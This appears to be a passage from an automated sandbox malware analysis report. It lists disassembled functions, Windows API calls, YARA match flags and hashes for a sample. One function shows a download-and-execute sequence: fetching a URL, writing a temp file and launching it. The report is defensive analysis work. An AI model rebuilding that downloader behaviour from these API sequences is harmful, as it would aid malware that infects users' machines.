                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040273F
                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0040274D
                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00402754
                                                                                                                                                                                                                                                                    • SetCapture.USER32(?), ref: 004027A1
                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004027D5
                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 004027EB
                                                                                                                                                                                                                                                                    • GetKeyState.USER32(0000001B), ref: 004027F8
                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 0040280D
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                                                                                                                                                                                                                                    • String ID: gya
                                                                                                                                                                                                                                                                    • API String ID: 2545303185-1989253062
                                                                                                                                                                                                                                                                    • Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                                                                                                                                                                                    • Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C
                                                                                                                                                                                                                                                                    Function 0042E6B2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$Info
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2509303402-0
                                                                                                                                                                                                                                                                    • Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                                                                                                                                                                                    • Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24
                                                                                                                                                                                                                                                                    Function 024EE919 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$Info
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2509303402-0
                                                                                                                                                                                                                                                                    • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                                                    • Instruction ID: ccde6b9d5692c033315b5ab6a8c795f841b83a804b2d9581facbe1bf21578853
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02B1AD71A002499FEF21DF69C880BAFBBF5BF48314F14416EE59AA7341DB75A8418B20
                                                                                                                                                                                                                                                                    Function 0043A5F8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 0043A63C
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A631
                                                                                                                                                                                                                                                                      • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A653
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A668
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A673
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A695
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A6A8
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A6B6
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A6C1
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A6F9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A700
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A71D
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A735
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                                                                                                    • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                    • Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A
                                                                                                                                                                                                                                                                    Function 024FA85F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 024FA8A3
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C0F
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C21
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C33
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C45
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C57
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C69
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C7B
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C8D
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C9F
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9CB1
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9CC3
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9CD5
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9CE7
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA898
                                                                                                                                                                                                                                                                      • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
                                                                                                                                                                                                                                                                      • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA8BA
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA8CF
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA8DA
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA8FC
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA90F
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA91D
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA928
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA960
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA967
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA984
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA99C
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                                                                                                    • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                    • Instruction ID: e2f8de537a3546ced4701bae047de9727c572679c1f75b14ebf35eb39c9f07e9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38319C316002119FEBB0AF7AD880B5BBBE9AF80350F11486FEA49D7750DBB0A850CA14
                                                                                                                                                                                                                                                                    Function 00439A89 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                                                                    • Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54
                                                                                                                                                                                                                                                                    Function 024C2C5B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134filenetworksynchronizationCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 024C2C7E
                                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 024C2C94
                                                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000105,?), ref: 024C2CB0
                                                                                                                                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 024C2CC6
                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 024C2CFF
                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 024C2D3B
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 024C2D58
                                                                                                                                                                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 024C2DCF
                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00008000), ref: 024C2DE4
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                                                                    • String ID: <
                                                                                                                                                                                                                                                                    • API String ID: 838076374-4251816714
                                                                                                                                                                                                                                                                    • Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                                                                                                                                                                                                    • Instruction ID: aa654bc57c3ad7445d99552aaf86822b21a08c106210855fbb8089566405b2b8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 394160B590021DAEEB20DF649C85FEA77BCFF15705F1080EAA545A2150DFB09E858FA4
                                                                                                                                                                                                                                                                    Function 024DEEC2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,024DF228,00000004,024D7D87,00000004,024D8069), ref: 024DEEF9
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,024DF228,00000004,024D7D87,00000004,024D8069,?,024D8799,?,00000008,024D800D,00000000,?,?,00000000,?), ref: 024DEF05
                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,024DF228,00000004,024D7D87,00000004,024D8069,?,024D8799,?,00000008,024D800D,00000000,?,?,00000000), ref: 024DEF15
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00447430), ref: 024DEF2B
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF41
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF58
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF6F
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF86
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF9D
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                    • String ID: advapi32.dll
                                                                                                                                                                                                                                                                    • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                                                    • Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                                                                                                                                                                                    • Instruction ID: 9c71dfb5babe54993bf6a7492855afb1ee1096368b068bb90988fde5d929ad68
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68218EB1908711BFE7106FB49C0CA5ABFA8EF05B16F004A2BF555E7601CBBC94418FA8
                                                                                                                                                                                                                                                                    Function 024DEEC5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,024DF228,00000004,024D7D87,00000004,024D8069), ref: 024DEEF9
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,024DF228,00000004,024D7D87,00000004,024D8069,?,024D8799,?,00000008,024D800D,00000000,?,?,00000000,?), ref: 024DEF05
                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,024DF228,00000004,024D7D87,00000004,024D8069,?,024D8799,?,00000008,024D800D,00000000,?,?,00000000), ref: 024DEF15
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00447430), ref: 024DEF2B
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF41
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF58
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF6F
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF86
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF9D
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                    • String ID: advapi32.dll
                                                                                                                                                                                                                                                                    • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                                                    • Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                                                                                                                                                                                    • Instruction ID: 73fb14bf46affd44553376bb7457c92806cb5da7ee928c3ed9e21d26ebe8384a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A218EB1908711BFE7106FA49C0CA5ABBECEF05B16F004A2BF555E7601CBBC94418BA8
                                                                                                                                                                                                                                                                    Function 024D24A7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024D670B), ref: 024D24B6
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024D24C4
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024D24D2
                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024D670B), ref: 024D2500
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 024D2507
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,024D670B), ref: 024D2522
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,024D670B), ref: 024D252E
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D2544
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024D2552
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                    • String ID: kernel32.dll
                                                                                                                                                                                                                                                                    • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                                                    • Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                                                                                                                                                                                    • Instruction ID: 3c0b1af4cbb45f53d4af35301b3a4d0a01a6ffc55bc56d525216210f7e756bb0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 881182759003117FE711BB75AC7DE6B7BACEE05B12720052BFC01E3292EBB9D5018A69
                                                                                                                                                                                                                                                                    Function 0042484D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104threadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866
                                                                                                                                                                                                                                                                      • Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45
                                                                                                                                                                                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
                                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00424898
                                                                                                                                                                                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
                                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0042495C
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                                                                    • String ID: pContext$switchState
                                                                                                                                                                                                                                                                    • API String ID: 3151764488-2660820399
                                                                                                                                                                                                                                                                    • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                                                    • Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798
                                                                                                                                                                                                                                                                    Function 00419746 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
                                                                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 00419779
                                                                                                                                                                                                                                                                    • SafeRWList.LIBCONCRT ref: 00419798
                                                                                                                                                                                                                                                                      • Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
                                                                                                                                                                                                                                                                      • Part of subcall function 00417767: List.LIBCMT ref: 00417782
                                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004197B9
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004197DD
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
